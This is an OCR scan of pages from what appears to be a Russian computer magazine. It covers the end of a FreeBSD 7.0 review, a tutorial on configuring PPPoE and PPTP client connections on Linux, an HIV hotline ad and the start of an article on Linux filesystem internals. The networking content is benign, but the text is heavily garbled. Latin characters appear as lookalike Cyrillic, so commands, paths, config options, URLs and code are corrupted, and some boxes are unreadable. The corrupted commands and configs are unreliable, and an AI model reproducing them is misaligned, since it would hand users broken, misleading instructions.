6СС по умолчан ию включена защита от эта к, направленных 
на переполнение стека (Зіаск-ЗтазЫпд Ргоіесіог). 

До версии 1 .0 обновлена библиотека ОрепВЗМ (Ореп Зоигсе 
Вавіс Зесигііу Мобиіе), реализующая Зип ВЗМ — подсистему 
аудита системных событий, отслеживающую их в реальном 



времени (была разработана в рамках проекта ТгивІесІВЗО). 
Список архитектур не изменился: АМ064, 1386, іа64, рс98 и 
РоѵѵегРС, однако сейчас ведутся работы по портированию 
на АРМ и ІШгаЗрагс Т1 , поэтому возможно когда-нибудь 
мы увидим РгееВЗО на наладонных устройствах и Зип 
Ыіадага. 

Скачать продукт можно как через ВіКоггепІ ЕоггепІзігееЬзсІ. 
ога:8080 І.таки через традиционный РТР РірУАір.ІгееЬвсІ. 
огд/риЬ/РгееВЗР ). Состав образов не изменился: первый 
— загрузочный, остальные — с пакетами, плюс отдельный образ 
сдокументацией. 

Процесс установки не претерпел глобальных изменений, это 
всетотже старый знакомый вувіпвіаіі. Хотя, признаться, ожидал 
увидеть новый инсталлятор (іпзіаіі [ ѵѵікіТгееЬзсІ.огаЛіпгІаШ . 
имеющий более дружелюбный графический интерфейс. Под- 
робнее о нем — смотри на врезке. 

Усовершенствована подсистема Еіпихиіаіог, которая поз- 
воляетзапускать бинарные файлы Еіпих без модификации 
и потерь на трансляцию системных вызовов одной ОС в 
другую. Осуществлен переход на Еіпих ядро 2.6.1 6. Однако 
по умолчанию эта возможность не включена, так какявляет- 
ся экспериментальной (по дефолту используется эмуляция 
2.4). Но включить просто, для этого устанавливаем значение 
вувсП переменной сотрак. Ііпих. озгеіеазе в «2 . 6 . 16». 
В утилите ЛгееЪзсІ-ирсІаке, обеспечивающей все обновления 
безопасности за счетустановки двоичных пакетов без необходи- 
мости пересборки системы, появилась дополнительная команда 
ирдгабе (обновляетсистемудо последнего релиза). 

К сожалению, портШгасе, который позволяет «увидеть» процес- 
сы, происходящие внутри операционной системы и пользо- 
вательских приложений, еще нельзя отнести кстабильным и 
полностью работоспособным. 

^ ЗАКЛЮЧЕНИЕ 

Даже из такого беглого обзора видно, что нововведения в вер- 
сии 7.0 носят не косметический, а глобальный характер. Радует 
улучшенная поддержка многопроцессорных систем на всех 
уровнях ОС и увеличение списка поддерживаемых устройств и 
ФС. Администраторы вместе с пользователями оценили новинку 
и активно переходят на РгееВЗО седьмой ветки. РІадеюсь, 
теперь и ты присоединишься к ним. □С 




> ѵѵагпіпд 

Реалтековская звуко- 
вая карта, без проблем 
работающая в шестой 
фре, в седьмой 
версии запускаться 
отказалась! Вполне 
возможно, что с до- 
бавлением поддержки 
нового оборудования 
модули для поддержки 
некоторых девайсов 
были убраны или от- 
ключены в настройках 
по умолчанию. 




> СІѴСІ 

• В «Руководстве 
РгееВЗО», которое 
можно прочитать на 
сайте проекта ( ѵѵѵѵѵѵ. 
ІгееЬзб.ога/сІос ) . ты 
найдешь ответы на 
подавляющее коли- 
чество вопросов по 
системе. Причем, 
оно уже давно пере- 
ведено на русский 
язык. 

• Интересные осо- 
бенности поддержки 
сети в РгееВЗО 
можно узнать из 
интервью с разра- 
ботчиками на ѵѵѵѵѵѵ. 
опіатр.сот - 

• Информацию по 
всем настройкам 
2Р5 можно получить 
на странице ѴѴіКі 

— ѵѵікі.ітееЬзсІ. 
огд/2Р5 - 
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ІЮРИЙ «ВОВЕП» РАЗЗОРЕНОВІ 



Прорыв 



сквозь РРР 



к о с к о р о с т н о к ое р а с 

эдключения по протоколам РРРоЕ и РРТР. Как правг 
сайтах интерн ет-п ровайдеров заточена под ѴѴіпсІоѵѵз. ^ 
^ин^ксоид^^^^^п^і^сложс уэуж и^Іопробуем^э^^^^^ыія, как И 
[настроить клиентский РРРоЕ/РРТР, взяв в качестве примера дистри 



тив 



ІКІІЬипШ 



□ НАСТРОЙКА РРРОЕ СОЕДИНЕНИЯ 

РРРоЕ (РоіпМо-РоіпІ Ргоіосоі оѵег ЕіЬегпеі) — протокол передачи фрей- 
мов РРР через Еікегпеі: соединения. Используется для подключения с 
традиционной связкой логин/пароль и поэтому популярен в хОЗЬ и тому 
подобных сервисах, где нет встроенных механизмов аутентификации 
пользователя. 

В современных дистрибутивах есть все, что нужно для работы с ним (учи- 
тывая, что в ядре этот протокол поддерживается, начиная с версии 2.3). 
Однако командой «дгер РРР /изг/згс/ііпих/ . сопРід» все равно 
стоит проверить параметры ядра, относящиеся к РРР. 

Подключение по РРРоЕ реализовано подобно обычному РРР соединению с 
использованием демона рррб.— такчто опытмодемных разбороклишним 
не будет. Чтобы установить РРРоЕ соединение, потребуется наличие в 
системе следующих пакетов: ррр.рррое и ррроесопР. По умолчанию в 
КІЛэипІи они уже инсталлированы: 



# Статический ІР устанавливается так 
ібасе екЫ іпек зкакіс 

аскЗгезв 192.168.0.25 
пекмогк 192.168.0.0 
дакеѵ/ау 192.168.0.1 
пектазк 255.255.255.0 
тки 1492 



В файле /еѣс/гезоіѵ. сопР обязательно указываем адрес хотя бы одно- 
го йЫЗ сервера (а лучше двух): 



$ зисіо тсесііі /еіс/гезоіѵ.соп* 

патезегѵег 111 .33.44.55 
патезегѵег 222 .44.55.66 



НАСТРАИВАЕМ РРРОЕ И РРТР ПОДКЛЮЧЕНИЯ В І_ШЦХ| 



$ сіркд -з ррроесопк 
Раскаде: ррроесопб 
Зкакиз: іпзкаіі ок іпзкаііесі 

В РРМ дистрибутивах нужно ввести «грт -да I дгер ррр». Следующим 
шагом настраиваем ЕіЬегпе* интерфейс или ставим драйвер для А05І_ мо- 
дема (иначе дальнейшие действия не имеютсмысла). Настроить Еібегпеі: 
можно, зайдя в «Системные настройки -> Настройка сети». Для ручной 
настройки открываем файл /еЪс/пеІмогк/іпіегРасез. 

$ біісіо тсесііі /еІс/пеІѵѵогк/іпІегТасез 

# Если ІР-адрес назначается динамически с помощью БНСР, 

прописываем : 

ібасе еккО іпек сікср 



После того, как все готово, переходим к настройке клиентского РРРоЕ 
соединения. Вариантов опять же несколько. Самый простой — ручное ре- 
дактирование двух файлов: /еіс/ррр/рар-зесгеіз (либо сЬар-зесгеІв, 
если провайдер использует СН АР аутентификацию; формат *-5есгеІз 
файлов одинаков) и /еіс/ррр/реегз/сізі-ргоѵісіег. Имя второго ис- 
пользуется в качестве аргумента команды роп и может быть выбрано любое. 
В состав (ЮіЛэипІи для удобства включена утилита ррроесопЕ Запускаем 
«зийо ррроесопР» — появится псевдографическое меню настройки. 
Следуй указаниям утилиты, в большинстве случаев просто подтверждая 
предлагаемые по умолчанию параметры. Утилита попытается найти подхо- 
дящий Е{бегпеІ интерфейс, используя пакеты РАО I (РРРоЕ Асбѵе Оізсоѵегу 
Іпібабоп), с помощью которых идет поиск активных концентраторов досту- 
па. Далееррроесолк сохраняеторигинальный файл с із1-ргоѵіб.ег . По- 
сле чего вводим логин и пароль, разрешаем, если нужно, автоматическое 
соединение при загрузке системы... вот и все. Для подключения предлага- 
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ется использовать скрипт /изг/Ып/роп. Если заглянуть внутрь, можно 
увидеть, что, кроме проверки наличия некоторых файлов, фактически 
выполняется всего одна команда «/изг/зЫп/рррб. саіі $РКОѴІБЕК». 
В общем виде вызов роп выглядит так: 

роп [ОРТІОЫЗ] [ргоѵісіег] [агдшпепбз] 

В качестве аргумента ргоѵісіег указывается файл из каталога /еЬс/ррр/ 
реегз. По умолчанию используется ргоѵісіег (это и есть переменная 
$РРОѴЮЕР). В нашем случае набираем: 

$ роп йзі -ргоѵісіег 

Ксожалению, везетне всегда, и порой (например, при наличии нескольких 
интерфейсов) приходится забуриваться в конфиги. Но ничего сложного в 
этом нет. Если подключиться можно только через зисіо.то не надо выдумы- 
вать и мудрить, просто добавь себя в нужную группу (в ІІЬипіи и некоторых 
других дистрибутивах для этих целей используется бір]. 

г конфиги рррое 

Начнем с самого простого файла /еЬс/ррр/рар-зесгеЬз (или сііар- 
зесгеіз). Открыв его, ты найдешьсвои логин и парольдля соединения в 
таком виде (результат работы ррроесопР ]: 

изег * раззмогб. 

Здесьдостаточно проверить правильность данных или вписать стро- 
ку самому, если ррроесопі 1 не использовался. Параметры соединения 
описываются в /еѣс/ррр/реегз/дзі -ргоѵісіег. У меня после работы 
ррроесопЕ он принял следующий вид: 

$зисіо тсесііі/еіс/ррр/реегз/сізі-ргоѵісіег 

поірсіебаиіі: 

# В таблице маршрутизации сделать данное соединение мар- 
шрутом по умолчанию 
сіеіаиІЬгоибе 
геріасебебаиібгоибе 



Ъісіе-раззѵюгсі 
#1ср-есііо-іп1:егѵа1 30 
#1ср-есііо-баі1иге 4 
поаибіі 

# Восстановить связь в случае разрыва 
регзізб 

# Использовать максимальный размер передаваемого пакета 
в 1492 байт 

шДи 1492 
изереегбпз 

В принципе, все параметры заданы, — но неуказано, с кем и чем соеди- 
няться, а так как интерфейсов у меня несколько, возникает путаница. Чтобы 
это исправить, добавим следующую строку: 

рбу " /изг/зЬіп/рррое -I ебЪО -Т 80 -ш 1452" 

Заглянув после работы ррроесоп^ в файл / еѣс /пеіѵюгк/ іпЬегЕасез , 
можно заметить появление новых строк: 

аибо бзі -ргоѵісіег 

ііасе бзі -ргоѵісіег іпеб ррр 
ргоѵісіег бзі -ргоѵісіег 

# абсіесі Ьу ррроесопі 
аибо ебііО 

ііасе ебііО іпеб шапиаі 
рге-ир /зЬіп/іісопіід ебЬО ир 

Если при загрузке системы нетребуется автоматическое подключение по 
РРРоЕ, просто комментируем эти строки. Повторяем попытку соединения. 
Для контроля можно ввести команду: 

$ іісопіід рррО 

рррО Ьіпк епсар: Роіпб-До-РоіпД Ргокосоі 

іпеб асМг: 157 .33 .34.178 Р-б-Р : 192 . 168 . 101 . 1 
Мазк: 255.255.255.255 

ВР РОІЫТОРОІЫТ КШШЫС ЫОАКР МІЛЗТІСАЗТ МТІІ:1480 
Мебгіс : 1 

ВХ раскебз : 283 еггогз : 0 бгорресПО оѵеггипз:0 
ігагпе : 0 

ТХ раскебз : 284 еггогз : 0 сігорресі:0 оѵеггипз:0 
саггіег : 0 

со11ізіопз:0 Схдиеиеіеп: 3 

ВХЪукез:3004 (2.9 КіВ) ТХЬубез:2744 (2.6 КіВ) 

За ходом подключения можно следить в системном журнале /ѵаг/іод/ 
теззадез. Для этого в другой консоли перед началом подключения 
вводим: 

$ баіі — 1 /ѵаг/іод/шеззадез 

Возможна ситуация, когда адрес есть, но доступ к ресурсам получить не 
удается. В этом случае, введя «гоиѣе - п », убедись, что маршрутизация 
настроена правильно. Маршрут, помеченный ка к 6.еРаи1 1 , долже н пока- 
зывать на интерфейсрррО. Если это нетак, вводим «гоиРе аб.6. сІеРаиІІ 
рррО» и проверяем: работает? 
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ІОкно Ікрррое из комплекта РР-РРРОЕІ 



Настройки ррроесопш 



^ НАСТРОЙКА НЕСКОЛЬКИХ СОЕДИНЕНИЙ 

Бывает, что пользователям требуется работать сразу с несколькими 
серверами, использующими РАР (например, РРРоЕ и резервное модемное 
соединение, ѴРЫ и другие). Если логин для каждого сервиса отличается, 
РРР, как правило, способен сам разрулить ситуацию. Но многие предпо- 
читают использовать один итотже логин для всех серверов, к которым 
подключаются (надеюсь, хоть пароли разные). Это может вызвать траблы, 
поскольку демон должен правильно выбрать нужную строку из файла рар- 
зесгеіз для аутентификации. Ему нужно помочь. Для начала в файле 
/еЬс/ррр/рар-зесгеІз знакастериска заменяем условным именем 
сервера. Примернотак: 

изег зегѵегі раззѵ/огсіі 
изег зегѵег2 раззѵгогс!2 

Создаем два файла, взяв за основу дзі-ргоѵісіег. В каждом из них 
при помощи параметров пате и гетоіепате задаем логин и сервер для 
подключения. 

пате изег 

гетоРепате зегѵегі 

Теперь просто указываем нужный файл в качестве аргумента роп. Это не 
единственный способ. Можно, как советуют тап и НОѴѴТО, использовать 



свой конфиг орѣіопз и подключать его при помощи параметра Лііе. Этот 
вариант рассмотрим чуть дальше, при настройке РРТР. 

г ПАКЕТ РР-РРРОЕ 

В дистрибутивах вроде Мапбгіѵа, ѴесіогЫпих и других для настройки РРРоЕ 
предлагается более простой варианте использованием пакета РР-РРРоЕ. 

В репозитарии ІІЬипіи он отсутствует, но его можно установить самостоя- 
тельно. Тем более, что процесс сложностей не вызывает. 

Качаем последнюю версию по ссылке на странице ѵѵѵѵѵѵ. гоагіпарепаиіп. 
сот/ргосІисі5/рррое . Распаковывам іаг.ді-архив, заходим внутрь каталога 
и вводим: «. / до-диі » или просто «. /до», если первая команда откажется 
работать. Далее отвечаем на стандартные вопросы: логин, интерфейс, 
активация при загрузке, 0Ы5, пароль, настройки межсетевого экрана. В 
последнем случае предлагается на выбор три варианта: ІЧОЫЕ (отключен), 
5ТАМ0АІ_0ЫЕ (применяем, когда компьютер один) и МА501ІЕРА0Е (когда 
компьютер используется в качестве сетевого шлюза). По окончании работы 
скрипта выводится итог: 

** Зшптагу об ѵгііаб уои епбегеб. ** 

ЕСЬегпеб Іпбегбасе: ебЫ 
Бзег пате: изег 
Асбіѵабе-оп-сіетапсі: N 0 
Ргітагу ББ5 : 111.33.44.55 

Зесопсіагу БЫЗ : 222.44.55.66 
Рігемаіііпд: ЗТАЫБАБОЫЕ 

На этом, собственно, установка закончена. После этого в системе можно 
обнаружить несколько скриптов и утилит: рррое-геіау, рррое-зеіир, 
рррое -зЬагЬ, рррое -зіор, ррро е - соппес б , рррое - з егѵег, рррое - 
зпі ЛИ, рррое- зѣакиз.рррое-мгаррег и ікрррое. Кстати, до версии 
3.6 имена скриптов начинались с приставки айзі-, поэтому в более ранних 
дистрибутивах следует искать именно их. Да и старые НОѴѴТО тоже нужно 
читать с этой поправкой. 

Чтобы инициировать соединение, достаточно набрать в консоли рррое- 
зіагі] для останова — рррое-збор; чтобы просмотреть статистику 
— рррое- зЬаІиз. А снова запустить конфигурационный скрипт можно с 
помощью рррое-зеЬир. Для удобства настройки и подключения предла- 
гается свой графический фронтэнд — Ькрррое. 

В ПОДКЛЮЧАЕМСЯ ПО РРТР 

Настройка ѴРЫ подключения по протоколу РРТР (РоіпМо-Роіп^ТиппеІіпд 
Ргоіосоі) во многом напоминает подключение по РРРоЕ. До недавнего вре- 
мени, из-за опасения лицензионных преследований по поводу протокола 
МРРЕ, в І_іпих отсутствовала нормальная поддержка РРТР, что вызывало 
проблемы и требовало лишнихтелодвижений. Полная поддержка этого 
протокола появилась, начиная с версии 2.6.13. Официальная была начата с 



Магия МТБ и М55 

Параметр МТТТ (Махітит Тгапзтй ІІпіТ) отвечает за максимальный 
размер передаваемого пакета. Если размер пакета будет больше, чем 
может пропустить маршрутизатор, то он будет разделен, что сразу 
скажется на скорости и пропускной способности. Если параметр не 
указать принудительно, значение будет выставлено автоматически 
и, увы, не всегда рационально. Рассчитывать его следует так. Макси- 
мальный размер фрейма ЕгЬегпеГ — 1518 байт, из них 14 — заголовок 
и 4 — контроль (то есть полезная нагрузка равна 1500 байт) . Далее 
РРРоЕ отбирает еще 6 байт, а РРР — 2. В итоге значение МТТ1 для 
РРРоЕ должно составлять не более 1492. 

При установлении ТСР соединения каждая сторона выставляет 
параметр Махітит Зе^тепг ЗІ 2 е (М55), определяющий максималь- 
ный размер ТСР сегмента на всем пути. По умолчанию его значение 
берется, как МТІІ для исходящего интерфейса минус размер заголов- 
ков ТСР и ІР (40) . Исходя из этого, максимальное значение М55 для 
ЕЛетеГ будет равняться 1460, а для РРРоЕ — 1452. 
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Параметры ядра 



*■$ дргер РрР /иіг/а«ДІРіш(-2-б.1в.13/ в і«ітІд 

даі= ід_$тгМСі М^ШРРн 

СМРІв.РСЗМ. И-РРР-Г 
даяіе от-а 
дар 

дар Ю Р№ І^ХкТЕЧ*ѵ 

дар 1б в Р№^А51НС=« 

дагіе п№_ йтдіс ттгчі 

мине, р» юитЕ-в 

дарід Р** ѣшотшщ 

СОІИ = І& в Р№ в |ІѴЕ-* 

дагіб_рр*те*г* 

дарі§_ррголтм«р 

дарід„іда в ррр-тр 

дага.хим^рр.ю»* 
адате бфр р^терх ѵ 
дар іо_шнч>№ &ьосо№-« 



2.6.14, а в 2.6.1 5 уже включен модуль шифрования РРР МРРЕ. 
Сначала, чтобы было понятней, разберем ручную настройку, а 
потом посмотрим на ОІЛ. Для поиска в репозитарии пакетов, 
относящихся к ррір, вводим: 

$ зибо арб-саске зеагск ррбр 

ррбр-ііпих — Роіпб-бо-Роіпб Типпеііпд Ргобосоі 
(РРТР) Сііепб 

кпеб — Тке Кпеб із а бгопбепб бо рррб. 
кѵрпс — ѵрп сііепбз бгопбепб бог КБЕ 
пебѵгогк-тападег-ррбр — пебѵгогк шападешепб 
бгатеѵгогк (РРТР ріидіп) 



гебизе-еар 

#гебизе-с1іар 

гебизе-тзскар 

регзізб 

# Количество попыток подключения в случае об- 
рыва соединения 
шахбаіі 10 
бебаиібгоибе 
геріасебебаиібгоибе 

В файл /еѣс/ррр/сЪар-зесгеѣз заносим логин и пароль: 
изег ррбр раззѵгогб * 




> іп!о 

• В ядро І_іпих 2.6.1 5 
включен модуль шиф- 
рования РРР МРРЕ 
для подключения к 
РРТР серверам. 

• Пользователи 
Мапбгіѵа могут найти 
настройки РРРоЕ 

и РРТР в Центре 
Управления Мапбгіѵа 
біпих, выбрав «Сеть 
и Интернет» -> 
«Настройка нового 
сетевого интерфейса 
(ІАЫ, І50Ы, А030». 

• Не забывай сохра- 
нять файлы из/еіс/ррр 
при обновлении или 
установке другого 
дистрибутива. 



Клиентскую часть обеспечивает проект РРТР Сііепі 
[ ррірсііепбзоигсебэгде.пеі: ). Поддерживается не только 
біпих, но и *В50. Этот клиент совместим со всеми серверами, 
работающими по протоколу РРТР: ѴѴіпбоѵѵз ѴРІМ, біпих РорТор, 
Сівсо РІХ и некоторыми другими. Клиент не обновлялся уже 
около двух лет, поэтому можно без тени сомнения устанавли- 
вать то, что есть в репозитарии. 



Если требуется войти в домен, запись должна выглядеть так: 

ботаіп\\изег ррбр раззмогб * 

И создаем описание подключения, аналогичнотому, как 
делали для РРРоЕ: 



• В бІЬипІи и некото- 
рых других дистри- 
бутивах для выхода 
в Сеть пользователь 
должен входить в 
группу сіір. 



$ зибо арб-деб іпзбаіі ррбр-ііпих 

В качестве рекомендуемых пакетов предлагался «кетеі- 
раісіі-трре». Надо сказать, что в моем случае все работало 
и без него, но при появлении проблем вспомни о нем. Имеет 
смысл поставить самое последнее ядро, где этот протокол под- 
держивается изначально. 

Отмечу, кстати, предусмотрительность ребят из Сапопісаі. Все 
нужные пакеты для подключения по РРТР находятся на С0-диске 
(который тебя и попросят вставить в привод после ввода коман- 
ды). Поэтому если РРТР — это единственная связь с внешним 
миром, добывать нужные пакеты окольными путями не придется. 
Если диск в кэше отсутствует, добавь его, набрав команду «зисіо 
арі-сдгот а ей». По запросу вставь СО и нажми <ЕпІег>. 
Теперь приступаем к редактированию конфигурационного 
файла: 



$ зисіо тсесііі /еіе/ррр/орііопз.ррір 

Іоск поаибк поЪзбсотр побебіабе 
# Отключаем ненужные проверки 
гебизе-рар 



$ зисіо тсесііі/еіс/ррр/реегз/ррір 

# Указываем адрес РРТР сервера 

рбу "ррбр 10.100.0.1 --поіаипскрррб" 
соппесб /Ып/бгие 
паше изег 

# Идентификатор из второго поля в сЪар-зесгебз 
гешобепаше ррбр 

# Подключаем файл настроек 
бііе /ебс/ррр/орбіопз .ррбр 
#гедиіге-шрре-128 
гедиіге-шрре-40 

іррагаш ррбр 

Настройки готовы. Теперь подключаемся: 

$ роп ррбр 

И смотрим вывод команды ЩсопШд. Если соединение уста- 
новлено и адрес получен, то считаем, что настройка прошла 
успешно. Но обычно РРТРтребуетбольше возни, чем РРРоЕ. В 
случае неудачи выполняем: 



• Настройку О N 16/ 
біпих для работы 
с РРРоЕ и ѴРЫ мы 
рассматриваем на 
примере дистрибутива 
КІІЬипІи. Ноучитывая, 
что база у всех одна, 
сказанное будет де й ст- 
вительно и в любом 
другом дистрибутиве. 

• 0 настройке РРРоЕ 
в ОрепВВО можно 
прочитать в статье 
«Нарезаем трафик 
ломтиками», опуб- 
ликованной в Пакере 
#087. 
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|КѴрпс — удобная программа для работы с ѴРЫ разныхтиповд 



Настройки РРРоЕ и РРТР в Центре Управления Мапсігіѵа 




О 



$ роп ррЕр сіеЪид сіитр ІодТсІ 2 посіеЕасЬ. 

Как результат, получим все параметры соединения и логоши- 
бок. Если есть необходимость в автоматическом подключении 
при загрузке системы, правим / еЪс/пеѣыогк/ іпЪегНасез : 



отключаем избыточные методы аутентификации. Если 
хочешь, в РоіЛіпд укажи 0Ы5 сервер и адреса, которые 
могут использовать это ѴРЫ соединение. 

Проект РРТР СІіепЕ предлагаетутилитуррЕрсопіиддля на- 
стройки подключения. В репозитарии ІІЬипІи она отсутствует. 
Чтобы установить ее, добавь информацию о новом репозита- 
рии в / еЕс / арі: / воигсез . ІізЕ: 

сІеЬ ЬЕЕр: //диогі .пеЕгек.огд/ррЕр/ррЕрсопбід 

./ 



> сіѵсі 



Подробно прото- 
кол РРРоЕ описан 
в РРС 2516. Кроме 
того, полезной будет 
информация на ѴѴіКі 
стра н и це ги.ѵѵікіресііа 
огд/ѵѵікі/РРРоЕ . 



$5ііс1о тсесІіІ/еІс/пеІѵѵогк/іпІегТасез 

аиЕо Еиппеі 
ібасе Еиппеі іпеЕ ррр 
ргоѵісіег ррЕр 

ВДАВИМ БАТОНЫ 

Для настройки и работы ты предпочитаешь программы с 
графическим интерфейсом? Тогда слушай. Пользователи 
Мапсігіѵа могутнайти настройки РРРоЕ и РРТР в Центре Управ- 
ления Мапсігіѵа Еіпих, выбрав «Сеть и Интернет» «Настрой- 
ка нового сетевого интерфейса (ЕАЫ, 150 N , А05Е)». Учти, что 
настройка РРТР находится в меню ОБЬ вместе с РРРоЕ, а не в 
ѴРЫ, где ее обычно начинают искать. 

В КІІЬипІи устанавливаем пакеты: 

$ зисіо арЕ-деЕ іпзЕаІІ пеЕѵюгк-тападег-ррЕр 
кѵрпс 

Первый пакет— это модуль к КІЧеЕл/огкМападег. Признаюсь, 
никогда его не любил и не юзал, наверное, сказывается долгое 
сидение в слаке, но тебе, может, он и понравится. Чтобы уви- 
деть настройки ѴРЫ, после установки пакета нужно перезапус- 
тить ЫеІѵѵогкМападег: 

$ зисіо /еЕс/сіЬиз-1/еѵепЕ . сі/25ЫеЕѵгогкМападег 
гезЕагЕ 

* КезЕагЕіпд пеЕѵ/огк соппесЕіоп тападег 
ЫеЕѵгогкМападег [ ОК ] 

$ зисіо /еЕс/сіЬиз-1/еѵепЕ . сі/2бЫеЕѵ70гкМападегБі 
зраЕсЪег гезЕагЕ 

* КезЕагЕіпд пеЕѵгогк еѵепЕз сіізраЕсІіег 
КеЕѵгагкМападегБізраЕсІіег [ ОК ] 

Теперь все просто. Выбираем «Параметры -> Сопбдиге» и 
нажимаем «Добавить». В появившемся окне вводим имя 
соединения (также будет именем файла в реегв), вводим 
ІР-адрес или имя сервера. Во вкладке Аиібепіісаііоп 



Обновляем список пакетов, устанавливаем и запускаем: 

$ зисіо арЕ-деЕ ирсіаЕе 
$ зисіо арЕ-деЕ іпзЕаІІ ррЕрсопбід 
$ зисіо ррЕрсопбід 

Появится окно программы, внизу которого расположено 
пять вкладок. В Зегѵегуказываем логин, пароль, название 
соединения и адрес сервера. Перейдя в ВоіЛіпд, можно 
изменить таблицу маршрутов и, например, разрешить 
подключаться к нашему туннелю другим компьютерам. По 
умолчанию берутся системные настройки йЫЗ серверов, 
переопределить их для туннеля можно во вкладке 0Ы5. В 
Епсгурііоп включаем (Рециіге) используемый провайде- 
ром алгоритм шифрования. И, наконец, в Мівсеііапеоиз 
можно указать автоматическое подключение при запуске 
программы, переподключение при потере соединения и 
ввести дополнительные параметры для р ррсі и ррір. По 
окончании работы программа создаст все нужные файлы, о 
которых говорилось выше. Выбираем нужное соединение и 
нажимаем ЗіагЕ 

Программа КѴрпс [ боте.дпа.огд/кѵрпс і является удоб- 
ным фронтэндом для многих типов ѴРЫ. Она поддержи- 
вает С і зоо ѴРЫ, ІРЗес, РРТР, ОрепѴРЫ, Е2ТР и Ѵіип. Все 
настройки выполняются при помощи простого мастера, 
вызываемого через «РгоЛІе -> Иеѵѵ РгоШе (ѴѴііагсІ)», 
который в пошаговом режиме поможет создать новое 
подключение. Так, на шаге «Зеіесі 1Ье Іуре оі уоиг ѴРЫ» 
выбираем тип ѴРЫ (в нашем случае — МісгозоіТ РРТР). На 
следующем шаге отмечаем дополнительные параметры 
РРТР, вводим логин и пароль. Выбираем из раскрываю- 
щегося списка сетевое устройство, с помощью которого 
должно производиться подключение. В окне «Ыеіѵѵогк 
гоіЛе орііопз» указываем: «Заменять маршрут по умол- 
чанию». 

Вот, собственно, и все по настройкам РРРоЕ и РРТР в совре- 
менных дистрибутивах. Удачи! іні 
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...соблюдаешь 
правила - 

спокоен, ты в 

порядке... 

Маша и Дима знают, 
как защитить себя от ВИЧ 



ВСЕ, ЧТО ТЫ ХОЧЕШЬ ЗНАТЬ о ВИЧ/СПИДе 

АНОНИМНО, БЕСПЛАТНО 



8 800 Й00 05 43 

Государственная горячая линия 



іѵѵѵѵѵѵ.БіорзрісІ.ги 



КАСАЕТСЯ КАЖДОГО 
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Во власти 



ФАЙЛОВАЯ СИСТЕМА ЫМЫХ В ПОДРОБНОСТЯХ 



Чтобы разобраться, как работает ОС Ілпих, прежде всего, нужно понять, 



/ 









как она управляет файлами. Поэтому на повестке дня у нас изучение архи- 



ДЕНИС КОЛИСНИЧЕНКО 

/ ОН5П-АВ5 МАІІ..КІІ. ѴѴѴѴѴѴ.0КѴѴ5.0ПС.ІІА / 



тектуры файловой системы Ілпих. А полученные теоретические знания мы 
разбавим практическими примерами. Что называется, на каждый день! 



Н АРХИТЕКТУРА ФАЙЛОВОЙ СИСТЕМЫ 

Прежде, чем приступить к рассмотрению архитектуры файловой системы 
І_іпих, нужно ответить на вопрос, что такое файловая система (ФС). В при- 
роде можно встретить различные определения, например, ФС — это способ 
представления информации на носителе данных. Или ФС — часть опера- 
ционной системы, обеспечивающая выполнение операций над файлами. 
Но более точным будет объединить эти понятия. Ведь, грубо говоря, любая 
файловая система состоит, минимум, из двух уровней — уровня представле- 
ния данных и набора системных вызовов для работы с данными. 

Зачастую ОС может работать с различными файловыми системами, на- 
пример, с основной файловой системой (используется на жестком диске) 
и с файловой системой СО — 1509660. Поэтому ОС должна обеспечить 
приложениям стандартный интерфейс, позволяющий обращаться к файлам 
на разных ФС прозрачно. Программист не должен каждый раз вникать в 
тонкости файловой системы заново. Например, в І_іпих для открытия файла 
используется системный вызов ореп () . Программа просто вызывает 
ореп () , передав ему имя файла, а на какой ФС расположен этот файл — не 
суть важно. 

Теперь посмотри на рисунок 1 . На нем изображено все сказанное выше. 
Зеленым отмечен пользовательский уровень, а желтым — уровень ядра. 
Приложение может использовать функции дІіЪс (библиотека 0 N II С) или 
же напрямую обратиться к системным вызовам ядра — тут уж какбудетугод- 
но программисту. Использовать функции дІіЬсудобнее, но, вызывая не- 
посредственно системные вызовы (например, ореп () , геа6( ) , ыгііе () , 
сіозе ()), можно немного повысить производительность приложения 
— ведьты минуешь дІіЬс, которая использует те же системные вызовы. 



ѴР5 — это виртуальная файловая система. Именно она позволяет добиться 
существующего сейчас уровня абстракции. Каждая файловая система 
имеетсвои особенности, и если бы не былоѴР5,то пришлосьбы разрабаты- 
вать разные версии системных вызовов для каждого типа поддерживаемой 
файловой системы (например, ореп_ехі:3 () — для открытия файла, на- 
ходящегося на файловой системе ехіЗ, или ореп_ѵЛаі: () — для ФС ѴРАТ). 
Другими словами, ѴР5 делает системные вызовы независимыми оттипа 
используемой файловой системы. 

г КОПАЕМ ГЛУБЖЕ 

Рисунок 1 — это общее представление о файловой системе І_іпих. РІастало 
время копнуть глубже. Рассмотрим логическую структуру файловой системы 
ехіЗ. Физически жесткий диск разбит на секторы размером 512 байт. Первый 
сектор дискового раздела в любой файловой системе считается загрузочной 
областью. В первичном разделе эта область содержитзагрузочную запись 
— фрагмент кода, который инициирует процесс загрузки операционной сис- 
темы при запуске. Ріа других разделах область не используется. Остальные 
секторы объединены в логические блоки размером 1,2 или 4 Кб. Логический 
блокесть наименьшая адресуемая порция данных: данные каждого файла 
занимают целое число блоков. Блоки, в свою очередь, объединяются в 
группы. Группы блоков и блоки внутри группы нумеруются последовательно, 
начиная с «1». 

Раздел диска, на котором сформирована файловая система ехіЗ, может 
быть представлен такой схемой (рис. 2). 

Суперблок служит начальной точкой файловой системы и хранит всю ин- 
формацию о ней. Он имеет размер 1 024 байта и располагается по смеще- 
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нию 1 024 байта от начала файловой системы. В каждой группе 
блоков он дублируется, что позволяет быстро восстановить его 
после сбоев. 

В суперблоке определяется размер файловой системы, 
максимальное число файлов в разделе, объем свободного 
пространства — и содержится информация отом, где искать 
незанятые участки. При запуске ОС суперблок считывается в 
память, и все изменения файловой системы вначале находят 
отображение в копии суперблока (на дискзаписываются 
только периодически). Это позволяет повысить производи- 
тельность системы, так как многие пользователи и процессы 
постоянно обновляют файлы. С другой стороны, при останове 
системы суперблок обязательно должен быть записан на диск, 
и это не дает вырубить компьютер простым выключением 
питания. Иначе при следующей загрузке информация, запи- 
санная в суперблоке, окажется не соответствующей реальному 
состоянию файловой системы. 

После суперблока следует описание (дескриптор) группы бло- 
ков. Хранящаяся в нем информация позволяет найти битовые 
карты блоков и индексных дескрипторов, а также таблицу 
индексных дескрипторов. 

Структуру системного блока можно найти в /изг/згс/ 
Ііпих/ іпсіисіе/ 1іпих/із .Ь: 

зРгисЦ зирег_Ыоск { 

зСгисС_]теа(і з_1ізЪ; // двусвязный спи- 
сок всех смонтированных ФС 

ипзідпесі Іопд з_Ыоскзіге; 
зРгисС бі1е_зузРет_Руре *з_буре; 
зЦгисЦ зирег_орегаЬіопз *з_ор; 
